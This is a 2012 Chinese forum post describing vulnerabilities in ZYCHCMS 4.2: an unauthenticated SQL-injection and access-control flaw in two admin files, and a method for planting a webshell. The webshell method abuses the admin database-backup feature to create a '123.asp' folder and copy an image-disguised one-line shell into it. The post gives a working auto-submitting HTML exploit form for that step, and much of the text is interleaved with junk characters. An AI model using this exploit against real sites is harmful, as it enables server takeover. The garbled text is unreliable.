4 |# Q+ F3 S4 ^
9 c% _ k4 q# G0 b3 D0 H
z+ j1 N3 Z6 t' a
4 E6 Q' w/ c. I% V9 p影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀); F9 [* E0 `7 [' A2 v$ {" d
①SQL注射漏洞* T: b1 D/ f5 x4 [7 z3 D
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
8 F9 h( i8 k5 b+ \ 漏洞原因:未过滤) Y5 M ^% Z% P; c
漏洞代码:
+ f- P$ m1 t4 L* B0 z& S/ h6 t 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
9 i# ~7 |! h, A* q% s, u 修复方法:在文件开头加入代码
# J; z9 @& A# }' M& v& O2 ]2 o 5 p" V& M3 @6 u- t& S. z3 t
% R% y& C1 }3 g+ G
②后台拿WBSHELL* U3 A8 t" `! M/ r
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。/ H+ F9 L) c: Q6 t, `. f4 B' W
这里在网上找了一个,改了下,将就着用。( y5 M2 j# x* L& f" x" y+ \1 L: `
以下是代码本地提交代码+ P, z4 r6 C+ o
4 b" K; T* n w i
5 N! `" E q; {- D0 d. H
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>3 w' f& _# K) I C+ y' H; j! I
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>6 d7 r7 I) L0 S; P6 ~, q
<tr>
& }# F% Q) `# B/ U' G <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
0 l4 a0 c6 S y5 i5 u </tr>
8 K7 \" z; j9 a" e( o) |$ u' H <tr>
2 ?* u- d- ?* L2 ^ <td bgcolor=”#FFFFFF”><span class=”back_southidc”>- R" s+ S* u" f- S8 Z' Z! f
</span>
. X( [3 h( n% p2 C4 l5 c <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >7 L( `6 S0 l1 q3 z7 z2 w: S
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >4 _2 p% u# S9 C: j( q
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>, A; ^, z! z6 v7 v) w$ z8 N
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d: S( e$ ?* a/ t1 H% y) z& F
<div align=”left”>7 f5 e6 _( o2 }# B3 R
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
# h# Y: m! ^6 F, J8 n7 B; P <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
+ J& Q) t! a3 S% @1 Q <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />: G p# }1 r1 l, j& X9 o9 @" Z
</div></td>, i0 a9 c) G5 G, A* y
</tr>% ]# W# `$ `) U
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
/ o* D: p9 `, @& i2 [' `% J( Q A <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>. \* N& {5 |* t$ f9 D
<td class=”td”><div align=”left”>
7 ~# i# O: j) r, N2 i3 k% o- T <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
; L0 n0 Y+ t" s& S& w [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
1 @" @+ F; I5 O# Q: i </tr>
. M2 v2 P n% `/ ~2 L: K6 y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
/ z0 l* V$ C# b9 O, @0 ]) { ^5 X' W <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>: \6 y% q) X: S. [4 A' J
<td class=”td”><div align=”left”>7 \6 Z. h- J3 h% x! c: O) j) @
<input type=”submit” value=”确定备份” class=”btn”
/ l. u) o9 r+ \! S; @# }" @ </div></td>
' g3 W5 _2 E8 V0 \- y4 Y </tr>
- Y, M$ c+ ]% D6 N2 v9 i* | </table></td></tr></form>
( I' _; q8 l7 j0 U </table>
) a- Q4 `1 h1 @' q% I% [, t </td>+ {9 K4 w; i) w* D& X% U
</tr>
/ k- h5 H! M3 c8 h. _ </table>0 H& c/ p- g+ [" q7 N
<script>
7 T% q& V/ J) U( v1 D/ w document.all.add.submit();
$ \: K& A! B; i8 W2 R7 k </script>
0 y+ ^, E7 X, s7 ]7 Q 9 Q" y( G6 p' l0 Y0 k: [7 m8 k
) U! t& u8 ~: t' ^7 x3 b g
, { s9 [, B$ S* ^! K& j* M: ] k6 g5 @6 Z
' S1 l, ^' U+ r# f/ I4 i. z4 K x7 w( r! S
* y7 X- M8 S G! l1 U
6 y2 B; }4 N8 X& w ~0 ^9 p# M+ {# |7 v
8 l0 Q! @. g5 {# L6 e% V$ T4 ]+ W
|
发表于 2012-9-10 21:09:51
收藏
支持
反对